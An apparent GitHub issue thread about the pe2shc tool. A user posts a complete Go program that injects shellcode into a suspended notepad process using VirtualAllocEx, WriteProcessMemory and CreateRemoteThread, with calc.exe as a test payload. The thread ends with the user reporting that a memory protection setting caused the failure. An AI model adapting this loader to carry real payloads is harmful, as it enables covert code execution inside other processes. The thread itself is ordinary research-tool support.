Donut works but pe2shc does not

[Beykir]

Hello,

Im using the latest windows 10 and pe2shc version and my problem is, i cant get a successfull injection with pe2shc to work.

I have added my sample golang script, which uses createremotethread for injecting. If i do "donut -i calc.exe" and load it with my golang script, calc is popping up. But if i do "pe2shc calc.exe" and load it with my script, nothing happens. If i run the generated file from pe2shc and run it with a double click it works too.

package main

import (
	"fmt"
	"unsafe"
	"syscall"
	"os"
	"bufio"
	"io"

	"golang.org/x/sys/windows"
)

func CreateProcess() *syscall.ProcessInformation{
	var si syscall.StartupInfo
	var pi syscall.ProcessInformation

	commandLine, err := syscall.UTF16PtrFromString(`c:\windows\system32\notepad.exe`)

	if err != nil {
		fmt.Println(err)
	}

	err = syscall.CreateProcess(
		nil,
		commandLine,
		nil,
		nil,
		false,
		windows.CREATE_SUSPENDED | windows.CREATE_NO_WINDOW,
		nil,
		nil,
		&si,
		&pi)

	if err != nil {
		fmt.Println(err)
	}

	return &pi
}

func CreateRemoteThread(shellcode []byte) {

	kernel32 := windows.NewLazySystemDLL("kernel32.dll")
	virtualAllocEx := kernel32.NewProc("VirtualAllocEx")
	virtualProtectEx := kernel32.NewProc("VirtualProtectEx")
	writeProcessMemory := kernel32.NewProc("WriteProcessMemory")
	createRemoteThread := kernel32.NewProc("CreateRemoteThread")
	closeHandle := kernel32.NewProc("CloseHandle")

	pi := CreateProcess()
	oldProtect := windows.PAGE_READWRITE

	lpBaseAddress, _, errVirtualAllocEx := virtualAllocEx.Call(uintptr(pi.Process), 0, uintptr(len(shellcode)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE)
	if errVirtualAllocEx.Error() != "The operation completed successfully." {
		fmt.Sprintf("Error calling VirtualAllocEx:\r\n%s", errVirtualAllocEx.Error())
	}

	_, _, errWriteProcessMemory := writeProcessMemory.Call(uintptr(pi.Process), lpBaseAddress, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), 0)
	if errWriteProcessMemory.Error() != "The operation completed successfully." {
		fmt.Sprintf("Error calling WriteProcessMemory:\r\n%s", errWriteProcessMemory.Error())
	}

	_, _, errVirtualProtectEx := virtualProtectEx.Call(uintptr(pi.Process), lpBaseAddress, uintptr(len(shellcode)), windows.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect)))
	if errVirtualProtectEx.Error() != "The operation completed successfully." {
		fmt.Sprintf("Error calling VirtualProtectEx:\r\n%s", errVirtualProtectEx.Error())
	}

	_, _, errCreateRemoteThreadEx := createRemoteThread.Call(uintptr(pi.Process), 0, 0, lpBaseAddress, 0, 0, 0)
	if errCreateRemoteThreadEx.Error() != "The operation completed successfully." {
		fmt.Sprintf("Error calling CreateRemoteThreadEx:\r\n%s", errCreateRemoteThreadEx.Error())
	}

	_, _, errCloseHandle := closeHandle.Call(uintptr(pi.Process))
	if errCloseHandle.Error() != "The operation completed successfully." {
		fmt.Sprintf("Error calling CloseHandle:\r\n%s", errCloseHandle.Error())
	}

	fmt.Println("INJECTED!")
}

func main() {
	file, err := os.Open("calc.shc.exe")
	if err != nil {
		fmt.Println(err)
	   	return
	}
	defer file.Close()
 
	// Get the file size
	stat, err := file.Stat()
	if err != nil {
	   fmt.Println(err)
	   return
	}
 
	// Read the file into a byte slice
	shellcode := make([]byte, stat.Size())
	_, err = bufio.NewReader(file).Read(shellcode)
	if err != nil && err != io.EOF {
	   fmt.Println(err)
	   return
	}

	CreateRemoteThread(shellcode)
}

[hasherezade]

Hi! Thank you for reporting, I will check it whenever I get some free time.

[Beykir]

Sorry it was my fault, changed protection to RW instead of RWX

[hasherezade]

ok, thank you for the update @Beykir ! I am glad that this is solved :)